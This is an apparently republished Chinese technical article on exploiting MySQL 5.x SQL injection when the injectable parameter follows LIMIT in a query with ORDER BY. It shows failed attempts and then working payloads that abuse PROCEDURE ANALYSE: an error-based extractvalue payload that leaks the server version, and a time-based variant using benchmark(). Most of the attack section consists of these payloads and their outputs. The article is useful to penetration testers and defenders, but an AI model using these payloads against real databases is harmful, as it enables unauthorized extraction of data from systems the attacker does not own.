mysql注入点在limit关键字后面利用方法
来源:易贤网 阅读:1195 次 日期:2015-08-24 14:06:28
温馨提示:易贤网小编为您整理了“mysql注入点在limit关键字后面利用方法”,方便广大网友查阅!

描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。

mysql注入点在limit关键字后面的利用方法

细节

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是mysql5.x,sql语句类似下面这样:

select field from table where id > 0 order by id limit 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

我们先看看 mysql 5.x 的文档中的 select 的语法:

select

[all | distinct | distinctrow ]

[high_priority]

[straight_join]

[sql_small_result] [sql_big_result] [sql_buffer_result]

[sql_cache | sql_no_cache] [sql_calc_found_rows]

select_expr [, select_expr ...]

[from table_references

[where where_condition]

[group by {col_name | expr | position}

[asc | desc], ... [with rollup]]

[having where_condition]

[order by {col_name | expr | position}

[asc | desc], ...]

[limit {[offset,] row_count | row_count offset offset}]

[procedure procedure_name(argument_list)]

[into outfile 'file_name' export_options

| into dumpfile 'file_name'

| into var_name [, var_name]]

[for update | lock in share mode]]

limit 关键字后面还有 procedure 和 into 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 procedure 关键字.mysql默认可用的存储过程只有 analyse (doc)。

尝试用这个存储过程:

mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse(1);

error 1386 (hy000): can't use order clause with this procedure

analyse支持两个参数,试试两个参数:

mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse(1,1);

error 1386 (hy000): can't use order clause with this procedure

依然无效,尝试在 analyse 中插入 sql 语句:

mysql> select field from table where id > 0 order by id limit 1,1 procedure analyse((select if(mid(version(),1,1) like 5, sleep(5),1)),1);

响应如下:

error 1108 (hy000): incorrect parameters to procedure 'analyse’

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

mysql> select field from user where id >0 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

error 1105 (hy000): xpath syntax error: ':5.5.41-0ubuntu0.14.04.1'

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

select field from table where id > 0 order by id limit 1,1 procedure analyse((select extractvalue(rand(),concat(0x3a,(if(mid(version(),1,1) like 5, benchmark(5000000,sha1(1)),1))))),1)

有意思的是,这里不能用sleep而只能用 benchmark。

另外,这里还有一种类似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30

更多信息请查看IT技术专栏

更多信息请查看数据库
由于各方面情况的不断调整与变化,易贤网提供的所有考试信息和咨询回复仅供参考,敬请考生以权威部门公布的正式信息和咨询为准!
关于我们 | 联系我们 | 人才招聘 | 网站声明 | 网站帮助 | 非正式的简要咨询 | 简要咨询须知 | 加入群交流 | 手机站点 | 投诉建议
工业和信息化部备案号:滇ICP备2023014141号-1 云南省教育厅备案号:云教ICP备0901021 滇公网安备53010202001879号 人力资源服务许可证:(云)人服证字(2023)第0102001523号
云南网警备案专用图标
联系电话:0871-65317125(9:00—18:00) 获取招聘考试信息及咨询关注公众号:hfpxwx
咨询QQ:526150442(9:00—18:00)版权所有:易贤网
云南网警报警专用图标